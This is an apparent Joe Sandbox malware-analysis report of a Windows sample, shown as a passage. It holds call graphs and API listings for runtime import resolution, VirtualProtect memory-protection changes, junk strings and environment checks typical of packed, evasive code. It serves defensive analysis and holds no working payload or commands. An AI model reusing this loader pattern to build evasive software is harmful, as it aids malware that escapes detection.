4494->4495 4497 4037f5 4495->4497 4498 401d3d _LocaleUpdate::_LocaleUpdate 67 API calls 4496->4498 4505 403771 4497->4505 4500 4037d7 4498->4500 4503 4037e5 _raise 4500->4503 4504 402149 __amsg_exit 67 API calls 4500->4504 4503->4486 4504->4503 4506 403775 4505->4506 4507 4037a7 4505->4507 4506->4507 4508 40365f ___addlocaleref 8 API calls 4506->4508 4513 403819 4507->4513 4509 403788 4508->4509 4509->4507 4510 4036e5 ___removelocaleref 8 API calls 4509->4510 4511 403793 4510->4511 4511->4507 4512 40351f ___freetlocinfo 67 API calls 4511->4512 4512->4507 4516 403416 RtlLeaveCriticalSection 4513->4516 4515 403820 4515->4500 4516->4515 4518 4038e0 _memset 4517->4518 4519 403989 4517->4519 4527 406192 4518->4527 4522 401662 setSBUpLow 5 API calls 4519->4522 4524 403a2b 4522->4524 4524->4474 4526 4065c2 ___crtLCMapStringA 102 API calls 4526->4519 4528 403ad7 _LocaleUpdate::_LocaleUpdate 77 API calls 4527->4528 4529 4061a3 4528->4529 4537 405fda 4529->4537 4532 4065c2 4533 403ad7 _LocaleUpdate::_LocaleUpdate 77 API calls 4532->4533 4534 4065d3 4533->4534 4615 406220 4534->4615 4538 406024 4537->4538 4539 405ff9 GetStringTypeW 4537->4539 4540 406011 4538->4540 4542 40610b 4538->4542 4539->4540 4541 406019 GetLastError 4539->4541 4543 40605d MultiByteToWideChar 4540->4543 4560 406105 4540->4560 4541->4538 4565 406e83 GetLocaleInfoA 4542->4565 4549 40608a 4543->4549 4543->4560 4545 401662 setSBUpLow 5 API calls 4547 403944 4545->4547 4547->4532 4548 40615c GetStringTypeA 4552 406177 4548->4552 4548->4560 4553 40609f _memset __alloca_probe_16 4549->4553 4554 406654 _malloc 67 API calls 4549->4554 4551 4060d8 MultiByteToWideChar 4556 4060ee GetStringTypeW 4551->4556 4557 4060ff 4551->4557 4558 403f64 __freea 67 API calls 4552->4558 4553->4551 4553->4560 4554->4553 4556->4557 4561 405ef0 4557->4561 4558->4560 4560->4545 4562 405f09 4561->4562 4563 405ef8 4561->4563 4562->4560 4563->4562 4564 403f64 __freea 67 API calls 4563->4564 4564->4562 4566 406eb4 4565->4566 4567 406eaf 
4565->4567 4596 406e72 4566->4596 4569 401662 setSBUpLow 5 API calls 4567->4569 4570 40612f 4569->4570 4570->4548 4570->4560 4571 406eca 4570->4571 4572 406f08 GetCPInfo 4571->4572 4576 406f92 4571->4576 4573 406f7d MultiByteToWideChar 4572->4573 4574 406f1f 4572->4574 4573->4576 4578 406f38 _strlen 4573->4578 4574->4573 4577 406f25 GetCPInfo 4574->4577 4575 401662 setSBUpLow 5 API calls 4579 406150 4575->4579 4576->4575 4577->4573 4580 406f32 4577->4580 4581 406f6a _memset __alloca_probe_16 4578->4581 4582 406654 _malloc 67 API calls 4578->4582 4579->4548 4579->4560 4580->4573 4580->4578 4581->4576 4583 406fc7 MultiByteToWideChar 4581->4583 4582->4581 4584 406ffe 4583->4584 4585 406fdf 4583->4585 4586 405ef0 __freea 67 API calls 4584->4586 4587 407003 4585->4587 4588 406fe6 WideCharToMultiByte 4585->4588 4586->4576 4589 407022 4587->4589 4590 40700e WideCharToMultiByte 4587->4590 4588->4584 4591 404032 __calloc_crt 67 API calls 4589->4591 4590->4584 4590->4589 4592 40702a 4591->4592 4592->4584 4593 407033 WideCharToMultiByte 4592->4593 4593->4584 4594 407045 4593->4594 4595 403f64 __freea 67 API calls 4594->4595 4595->4584 4599 407396 4596->4599 4600 4073ad 4599->4600 4603 40716b 4600->4603 4604 403ad7 _LocaleUpdate::_LocaleUpdate 77 API calls 4603->4604 4607 40717e 4604->4607 4605 407190 4606 40427c _strcat_s 67 API calls 4605->4606 4608 407195 4606->4608 4607->4605 4611 4071cd 4607->4611 4609 40421d _strcat_s 67 API calls 4608->4609 4614 406e7f 4609->4614 4610 40707c __isctype_l 91 API calls 4610->4611 4611->4610 4612 407212 4611->4612 4613 40427c _strcat_s 67 API calls 4612->4613 4612->4614 4613->4614 4614->4567 4616 40623f LCMapStringW 4615->4616 4620 40625a 4615->4620 4617 406262 GetLastError 4616->4617 4616->4620 4617->4620 4618 406457 4622 406e83 ___ansicp 91 API calls 4618->4622 4619 4062b4 4621 4062cd MultiByteToWideChar 4619->4621 4644 40644e 4619->4644 4620->4618 4620->4619 4630 4062fa 4621->4630 4621->4644 4624 40647f 4622->4624 4623 401662 setSBUpLow 
5 API calls 4625 403964 4623->4625 4626 406573 LCMapStringA 4624->4626 4627 406498 4624->4627 4624->4644 4625->4526 4661 4064cf 4626->4661 4628 406eca ___convertcp 74 API calls 4627->4628 4632 4064aa 4628->4632 4629 40634b MultiByteToWideChar 4633 406364 LCMapStringW 4629->4633 4655 406445 4629->4655 4631 406654 _malloc 67 API calls 4630->4631 4639 406313 __alloca_probe_16 4630->4639 4631->4639 4635 4064b4 LCMapStringA 4632->4635 4632->4644 4637 406385 4633->4637 4633->4655 4634 40659a 4641 403f64 __freea 67 API calls 4634->4641 4634->4644 4647 4064d6 4635->4647 4635->4661 4636 405ef0 __freea 67 API calls 4636->4644 4640 40638d 4637->4640 4646 4063b6 4637->4646 4638 403f64 __freea 67 API calls 4638->4634 4639->4629 4639->4644 4645 40639f LCMapStringW 4640->4645 4640->4655 4641->4644 4642 4064e7 _memset __alloca_probe_16 4654 406525 LCMapStringA 4642->4654 4642->4661 4643 4063d1 __alloca_probe_16 4648 406405 LCMapStringW 4643->4648 4643->4655 4644->4623 4645->4655 4646->4643 4649 406654 _malloc 67 API calls 4646->4649 4647->4642 4650 406654 _malloc 67 API calls 4647->4650 4651 40641d WideCharToMultiByte 4648->4651 4652 40643f 4648->4652 4649->4643 4650->4642 4651->4652 4653 405ef0 __freea 67 API calls 4652->4653 4653->4655 4656 406541 4654->4656 4657 406545 4654->4657 4655->4636 4660 405ef0 __freea 67 API calls 4656->4660 4659 406eca ___convertcp 74 API calls 4657->4659 4659->4656 4660->4661 4661->4634 4661->4638 4662->4477 4666 404c76 4663->4666 4667 403ad7 _LocaleUpdate::_LocaleUpdate 77 API calls 4666->4667 4668 404c87 4667->4668 4668->4407 4669 406bf0 RtlUnwind 4670 4040f1 4671 4040f4 4670->4671 4674 406a50 4671->4674 4675 406a75 4674->4675 4676 406a7c 4674->4676 4677 402465 __amsg_exit 67 API calls 4675->4677 4686 404578 4676->4686 4677->4676 4680 406a8d _memset 4682 406b3b 4680->4682 4685 406b10 SetUnhandledExceptionFilter UnhandledExceptionFilter 4680->4685 4710 4023ea 4682->4710 4685->4682 4687 401b21 __amsg_exit 67 API calls 4686->4687 4688 404583 
4687->4688 4688->4680 4689 404585 4688->4689 4692 404591 _raise 4689->4692 4690 4045ed 4691 4045ce 4690->4691 4696 4045fc 4690->4696 4695 401b21 __amsg_exit 67 API calls 4691->4695 4692->4690 4692->4691 4693 4045b8 4692->4693 4699 4045b4 4692->4699 4694 401cc6 _raise 67 API calls 4693->4694 4697 4045bd _siglookup 4694->4697 4695->4697 4698 40427c _strcat_s 67 API calls 4696->4698 4701 404663 4697->4701 4703 4023ea _raise 67 API calls 4697->4703 4704 4045c6 _raise 4697->4704 4700 404601 4698->4700 4699->4693 4699->4696 4702 40421d _strcat_s 67 API calls 4700->4702 4705 4034ee __lock 67 API calls 4701->4705 4706 40466e 4701->4706 4702->4704 4703->4701 4704->4680 4705->4706 4707 401b18 _raise 67 API calls 4706->4707 4708 4046a3 4706->4708 4707->4708 4713 4046f9 4708->4713 4711 4022f7 _raise 67 API calls 4710->4711 4712 4023f7 4711->4712 4714 404706 4713->4714 4715 4046ff 4713->4715 4714->4704 4717 403416 RtlLeaveCriticalSection 4715->4717 4717->4714 4718 401e76 GetModuleHandleA 4719 401e91 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4718->4719 4720 401e88 4718->4720 4722 401edb TlsAlloc 4719->4722 4751 401bca 4720->4751 4725 401ff5 4722->4725 4726 401f29 TlsSetValue 4722->4726 4726->4725 4727 401f3a 4726->4727 4762 402419 4727->4762 4730 401aaa __init_pointers 67 API calls 4731 401f4a 4730->4731 4732 401aaa __init_pointers 67 API calls 4731->4732 4733 401f5a 4732->4733 4734 401aaa __init_pointers 67 API calls 4733->4734 4735 401f6a 4734->4735 4736 401aaa __init_pointers 67 API calls 4735->4736 4737 401f7a 4736->4737 4769 403378 4737->4769 4740 401ff0 4741 401bca __mtterm 70 API calls 4740->4741 4741->4725 4742 401b21 __amsg_exit 67 API calls 4743 401f9b 4742->4743 4743->4740 4744 404032 __calloc_crt 67 API calls 4743->4744 4745 401fb4 4744->4745 4745->4740 4746 401b21 __amsg_exit 67 API calls 4745->4746 4747 401fce 4746->4747 4747->4740 4748 401fd5 4747->4748 4749 401c07 _raise 67 API calls 4748->4749 4750 401fdd GetCurrentThreadId 4749->4750 
4750->4725 4752 401bd4 4751->4752 4753 401be0 4751->4753 4755 401b21 __amsg_exit 67 API calls 4752->4755 4754 401bf4 TlsFree 4753->4754 4756 401c02 4753->4756 4754->4756 4755->4753 4757 4033db RtlDeleteCriticalSection 4756->4757 4758 4033f3 4756->4758 4759 403f64 __freea 67 API calls 4757->4759 4760 403405 RtlDeleteCriticalSection 4758->4760 4761 401e8d 4758->4761 4759->4756 4760->4758 4763 401b18 _raise 67 API calls 4762->4763 4764 40241f __init_pointers 4763->4764 4773 404106 4764->4773 4767 401aaa __init_pointers 67 API calls 4768 401f3f 4767->4768 4768->4730 4770 403381 4769->4770 4771 404763 ___crtInitCritSecAndSpinCount 67 API calls 4770->4771 4772 401f87 4770->4772 4771->4770 4772->4740 4772->4742 4774 401aaa __init_pointers 67 API calls 4773->4774 4775 402451 4774->4775 4775->4767 4776 401877 4777 401886 4776->4777 4778 40188c 4776->4778 4779 4023ea _raise 67 API calls 4777->4779 4782 40240a 4778->4782 4779->4778 4781 401891 _raise 4783 4022f7 _raise 67 API calls 4782->4783 4784 402415 4783->4784 4784->4781 4785 4027fa 4786 402807 4785->4786 4790 40280c _strlen 4785->4790 4787 403f46 ___initmbctable 111 API calls 4786->4787 4787->4790 4788 402818 4789 404032 __calloc_crt 67 API calls 4797 40283f _strlen 4789->4797 4790->4788 4790->4789 4791 40289a 4792 403f64 __freea 67 API calls 4791->4792 4792->4788 4793 404032 __calloc_crt 67 API calls 4793->4797 4794 4028bf 4795 403f64 __freea 67 API calls 4794->4795 4795->4788 4796 404bcb _strcpy_s 67 API calls 4796->4797 4797->4788 4797->4791 4797->4793 4797->4794 4797->4796 4798 404121 __invoke_watson 10 API calls 4797->4798 4798->4797 4799 4023fb 4800 4022f7 _raise 67 API calls 4799->4800 4801 402406 4800->4801 4884 40213b SetUnhandledExceptionFilter 3989 402f3e HeapCreate 3990 402f61 3989->3990 3991 402f5e 3989->3991 3998 402ee3 3990->3998 3994 402f94 3997 402f7f HeapDestroy 3997->3991 3999 4021f2 ___crtInitCritSecAndSpinCount 67 API calls 3998->3999 4000 402efa 3999->4000 4001 402f09 4000->4001 4002 404121 
__invoke_watson 10 API calls 4000->4002 4003 402229 __init_pointers 67 API calls 4001->4003 4002->4001 4004 402f15 4003->4004 4005 402f24 4004->4005 4006 404121 __invoke_watson 10 API calls 4004->4006 4005->3994 4007 405045 RtlAllocateHeap 4005->4007 4006->4005 4008 402f7a 4007->4008 4008->3994 4008->3997 4802 4020fe 4803 402136 4802->4803 4805 40210c 4802->4805 4805->4803 4806 4040cd 4805->4806 4807 4040d9 _raise 4806->4807 4808 401d3d _LocaleUpdate::_LocaleUpdate 67 API calls 4807->4808 4810 4040de 4808->4810 4809 406a50 _abort 69 API calls 4811 404100 _raise 4809->4811 4810->4809 4811->4803

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 90 4012c0-4012e8 FindFirstFileA call 401080
                          APIs
                          • FindFirstFileA.KERNELBASE(ks clku .d,E61B8D13), ref: 004012DD
                            • Part of subcall function 00401080: GetTickCount.KERNEL32 ref: 00401096
                            • Part of subcall function 00401080: GetDesktopWindow.USER32 ref: 004010B8
                            • Part of subcall function 00401080: GetClassNameA.USER32(00000000,00000000,00000400), ref: 004010CC
                            • Part of subcall function 00401080: GlobalAlloc.KERNELBASE(00000000,000F6950), ref: 004010EE
                            • Part of subcall function 00401080: GetCurrentProcess.KERNEL32(?), ref: 0040114B
                            • Part of subcall function 00401080: GetProcessIoCounters.KERNEL32(00000000), ref: 0040114E
                            • Part of subcall function 00401080: GetCurrentProcess.KERNEL32(?,?,?,?), ref: 004011B9
                            • Part of subcall function 00401080: GetProcessTimes.KERNELBASE(00000000), ref: 004011BC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1641140611.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1641121132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1641140611.000000000040D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1641183888.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: Process$Current$AllocClassCountCountersDesktopFileFindFirstGlobalNameTickTimesWindow
                          • String ID: ks clku .d
                          • API String ID: 973805369-4096487313
                          • Opcode ID: f572dfb4ccbad4a63051ea1b90dc6402510860d94203dc7c9fb76134c3d65c66
                          • Instruction ID: 8201e92c16030f82e268503128fd01f75d7624b5287a074f0a6a6b49dcde2be8
                          • Opcode Fuzzy Hash: f572dfb4ccbad4a63051ea1b90dc6402510860d94203dc7c9fb76134c3d65c66
                          • Instruction Fuzzy Hash: 13C012701042448FC330AF24DE0ABAA37E4AB48300F00093AA5E8E60A4DA3455598A8A

                          Control-flow Graph

                          APIs
                          • GetTickCount.KERNEL32 ref: 00401096
                          • GetDesktopWindow.USER32 ref: 004010B8
                          • GetClassNameA.USER32(00000000,00000000,00000400), ref: 004010CC
                          • GlobalAlloc.KERNELBASE(00000000,000F6950), ref: 004010EE
                          • GetCurrentProcess.KERNEL32(?), ref: 0040114B
                          • GetProcessIoCounters.KERNEL32(00000000), ref: 0040114E
                          • GetCurrentProcess.KERNEL32(?,?,?,?), ref: 004011B9
                          • GetProcessTimes.KERNELBASE(00000000), ref: 004011BC
                          Strings
                          • cjkU dklu UUido c;aopi quio ,mvnciu cxklnsp, xrefs: 00401131
                          Memory Dump Source
                          • Source File: 00000000.00000002.1641140611.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1641121132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1641140611.000000000040D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1641183888.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: Process$Current$AllocClassCountCountersDesktopGlobalNameTickTimesWindow
                          • String ID: cjkU dklu UUido c;aopi quio ,mvnciu cxklnsp
                          • API String ID: 509927810-2920797944
                          • Opcode ID: e0b8abb97aa25d1df5e5a951dd4f26f151847d18626d26f9063e3e0a3aa5dc8f
                          • Instruction ID: 30898c1c04428891cb82ceb7e239a2b08516cd6c9376f1465321758e23d54b14
                          • Opcode Fuzzy Hash: e0b8abb97aa25d1df5e5a951dd4f26f151847d18626d26f9063e3e0a3aa5dc8f
                          • Instruction Fuzzy Hash: E55127F1D041744BDB288B298D54BB9BBF5ABC5305F0881BEE689B7381D5385A48CF28

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 17 407a98-407a9f GetModuleHandleA 18 407aa1-407ab0 call 407ab5 17->18 19 407adf 17->19 29 407ab2-407abd GetProcAddress 18->29 30 407b17 18->30 20 407ae1-407ae5 19->20 22 407b24 call 407b29 20->22 23 407ae7-407aef GetModuleHandleA 20->23 26 407af1-407af9 23->26 26->26 28 407afb-407afe 26->28 28->20 31 407b00-407b02 28->31 29->19 33 407abf-407acc VirtualProtect 29->33 32 407b18-407b20 30->32 36 407b04-407b06 31->36 37 407b08-407b10 31->37 41 407b22 32->41 34 407ade 33->34 35 407ace-407adc VirtualProtect 33->35 34->19 35->34 39 407b11-407b12 GetProcAddress 36->39 37->39 39->30 41->28
                          APIs
                          • GetModuleHandleA.KERNEL32(00407A8F), ref: 00407A98
                          • GetModuleHandleA.KERNEL32(?,00407A8F), ref: 00407AEA
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00407B12
                            • Part of subcall function 00407AB5: GetProcAddress.KERNEL32(00000000,00407AA6), ref: 00407AB6
                            • Part of subcall function 00407AB5: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00407AA6,00407A8F), ref: 00407AC8
                            • Part of subcall function 00407AB5: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00407AA6,00407A8F), ref: 00407ADC
                          Memory Dump Source
                          • Source File: 00000000.00000002.1641140611.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1641121132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1641140611.000000000040D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1641183888.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProcProtectVirtual
                          • String ID:
                          • API String ID: 2099061454-0
                          • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                          • Instruction ID: 53099f65029657388ac4b193d9ffb221688749bb3c6439a8311ebbe5e3b7996f
                          • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                          • Instruction Fuzzy Hash: B501CC00F4D24539DA2051754C0197F7AA89A533687141677A111B72D3D9BCBE0692BF

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 42 407a59-407a6e 43 407a70-407a78 42->43 44 407adf 42->44 43->44 46 407a7a-407aa8 call 407a98 43->46 45 407ae1-407ae5 44->45 47 407b24 call 407b29 45->47 48 407ae7-407aef GetModuleHandleA 45->48 54 407aaa 46->54 55 407b1e-407b20 46->55 51 407af1-407af9 48->51 51->51 53 407afb-407afe 51->53 53->45 56 407b00-407b02 53->56 57 407aac-407ab0 54->57 58 407b0d-407b10 54->58 59 407b22 55->59 60 407b18-407b1d 55->60 61 407b04-407b06 56->61 62 407b08-407b0c 56->62 65 407b17 57->65 66 407ab2-407abd GetProcAddress 57->66 63 407b11-407b12 GetProcAddress 58->63 59->53 60->55 61->63 62->58 63->65 65->60 66->44 67 407abf-407acc VirtualProtect 66->67 68 407ade 67->68 69 407ace-407adc VirtualProtect 67->69 68->44 69->68
                          APIs
                          • GetModuleHandleA.KERNEL32(?,00407A8F), ref: 00407AEA
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00407B12
                            • Part of subcall function 00407A98: GetModuleHandleA.KERNEL32(00407A8F), ref: 00407A98
                            • Part of subcall function 00407A98: GetProcAddress.KERNEL32(00000000,00407AA6), ref: 00407AB6
                            • Part of subcall function 00407A98: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00407AA6,00407A8F), ref: 00407AC8
                            • Part of subcall function 00407A98: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00407AA6,00407A8F), ref: 00407ADC
                          Memory Dump Source
                          • Source File: 00000000.00000002.1641140611.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1641121132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1641140611.000000000040D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1641183888.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProcProtectVirtual
                          • String ID:
                          • API String ID: 2099061454-0
                          • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                          • Instruction ID: 8932c9a1b40894ead954c0166dfb712feb6fdadac19e13bdf209ed336a7ac0e8
                          • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                          • Instruction Fuzzy Hash: DE21F621A4D2416EEB2186B44C0166B7BE49B13368F1946A7D141EB2C3D1BC7D4687AB

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 70 407ab5-407abd GetProcAddress 71 407adf 70->71 72 407abf-407acc VirtualProtect 70->72 75 407ae1-407ae5 71->75 73 407ade 72->73 74 407ace-407adc VirtualProtect 72->74 73->71 74->73 76 407b24 call 407b29 75->76 77 407ae7-407aef GetModuleHandleA 75->77 79 407af1-407af9 77->79 79->79 80 407afb-407afe 79->80 80->75 81 407b00-407b02 80->81 82 407b04-407b06 81->82 83 407b08-407b10 81->83 84 407b11-407b17 GetProcAddress 82->84 83->84 87 407b18-407b20 84->87 89 407b22 87->89 89->80
                          APIs
                          • GetProcAddress.KERNEL32(00000000,00407AA6), ref: 00407AB6
                          • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00407AA6,00407A8F), ref: 00407AC8
                          • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00407AA6,00407A8F), ref: 00407ADC
                          • GetModuleHandleA.KERNEL32(?,00407A8F), ref: 00407AEA
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00407B12
                          Memory Dump Source
                          • Source File: 00000000.00000002.1641140611.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1641121132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1641140611.000000000040D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1641183888.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: AddressProcProtectVirtual$HandleModule
                          • String ID:
                          • API String ID: 2152742572-0
                          • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                          • Instruction ID: 39b30828dda2cca0c429c80848ec8113aa03dbdf6ed959677c669bf53de2d5ad
                          • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                          • Instruction Fuzzy Hash: 98F0F400E8D2043CEE2151B40C01ABBBBEC86633687241A27A211E72C3D4BC7E0692BB

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 93 402f3e-402f5c HeapCreate 94 402f61-402f6e call 402ee3 93->94 95 402f5e-402f60 93->95 98 402f70-402f7d call 405045 94->98 99 402f94-402f97 94->99 98->99 102 402f7f-402f92 HeapDestroy 98->102 102->95
                          APIs
                          • HeapCreate.KERNELBASE(00000000,00001000,00000000,004017AC,00000001), ref: 00402F4F
                          • HeapDestroy.KERNEL32 ref: 00402F85
                          Memory Dump Source
                          • Source File: 00000000.00000002.1641140611.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1641121132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1641140611.000000000040D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1641183888.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: Heap$CreateDestroy
                          • String ID:
                          • API String ID: 3296620671-0
                          • Opcode ID: 7bbac67fe878dc3ebcdb7e33c34032945d00a98356e3978511e20ae8c663db98
                          • Instruction ID: 98ebcd61208b82bef51758d9ec37e8992e6abd11400b15b10fa3614edeb5f36b
                          • Opcode Fuzzy Hash: 7bbac67fe878dc3ebcdb7e33c34032945d00a98356e3978511e20ae8c663db98
                          • Instruction Fuzzy Hash: D3E092706643029EEB40AB31AF0D72636E4E74078AF10843BF548F51E2EBBC8605AF4C

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 204 404854-404876 call 401b18 207 40492a-404934 204->207 208 40487c-40488b LoadLibraryA 204->208 211 404936-40493c 207->211 212 4049af-4049b7 207->212 209 404891-4048a1 GetProcAddress 208->209 210 404a0a 208->210 209->210 215 4048a7-4048e9 call 401aaa GetProcAddress call 401aaa GetProcAddress call 401aaa call 4021f2 209->215 216 404a0c-404a10 210->216 211->212 217 40493e-404957 call 401b21 * 2 211->217 213 4049b9-4049c2 call 401b21 212->213 214 4049ea-4049f8 call 401b21 212->214 213->214 227 4049c4-4049cb 213->227 214->210 226 4049fa-404a08 214->226 244 4048f8-4048fc 215->244 245 4048eb-4048f5 call 404121 215->245 217->212 232 404959-40495b 217->232 226->216 227->214 237 4049cd-4049d5 227->237 232->212 236 40495d-404961 232->236 246 404963-404974 236->246 247 40497c-404988 call 402229 236->247 237->214 239 4049d7-4049e0 call 401b21 237->239 239->214 252 4049e2-4049e7 239->252 244->207 250 4048fe-404914 GetProcAddress call 401aaa 244->250 245->244 246->247 258 404976-40497a 246->258 259 404997-40499b 247->259 260 40498a-404994 call 404121 247->260 250->207 264 404916-404925 GetProcAddress call 401aaa 250->264 252->214 258->212 258->247 262 4049a6-4049ad 259->262 263 40499d-4049a4 259->263 260->259 262->214 263->214 264->207
                          APIs
                          • LoadLibraryA.KERNEL32(USER32.DLL,00000000,00000000,00000314,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00404881
                          • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0040489D
                            • Part of subcall function 00401AAA: TlsGetValue.KERNEL32(00000000,00401B1F,00000000,00404862,00000000,00000000,00000314,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401AB7
                            • Part of subcall function 00401AAA: TlsGetValue.KERNEL32(00000004,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401ACE
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004048BA
                            • Part of subcall function 00401AAA: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401AE3
                            • Part of subcall function 00401AAA: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00401AFE
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004048CF
                          • __invoke_watson.LIBCMT ref: 004048F0
                            • Part of subcall function 00404121: _memset.LIBCMT ref: 004041AD
                            • Part of subcall function 00404121: IsDebuggerPresent.KERNEL32(?,?,00000000), ref: 004041CB
                            • Part of subcall function 00404121: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000000), ref: 004041D5
                            • Part of subcall function 00404121: UnhandledExceptionFilter.KERNEL32(0040B078,?,?,00000000), ref: 004041DF
                            • Part of subcall function 00404121: GetCurrentProcess.KERNEL32(C000000D,?,?,00000000), ref: 004041FA
                            • Part of subcall function 00404121: TerminateProcess.KERNEL32(00000000,?,?,00000000), ref: 00404201
                            • Part of subcall function 00401B21: TlsGetValue.KERNEL32(00000000,00401BB6,?,?,?,00402F66), ref: 00401B2E
                            • Part of subcall function 00401B21: TlsGetValue.KERNEL32(00000004,?,?,?,00402F66), ref: 00401B45
                            • Part of subcall function 00401B21: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,00402F66), ref: 00401B5A
                            • Part of subcall function 00401B21: GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 00401B75
                          • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 00404904
                          • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 0040491C
                          • __invoke_watson.LIBCMT ref: 0040498F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1641140611.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1641121132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1641140611.000000000040D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1641183888.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: AddressProc$Value$ExceptionFilterHandleModuleProcessUnhandled__invoke_watson$CurrentDebuggerLibraryLoadPresentTerminate_memset
                          • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                          • API String ID: 2940365033-232180764
                          • Opcode ID: d0843e3b680be133648664f8717c69194e3d07d516d4994a3cb1c1e79535d4f8
                          • Instruction ID: 59fbdf2cbb2ff75c7ae2a14c3bd4fe5a66861bdf874bec260bfce3d1cd22fe51
                          • Opcode Fuzzy Hash: d0843e3b680be133648664f8717c69194e3d07d516d4994a3cb1c1e79535d4f8
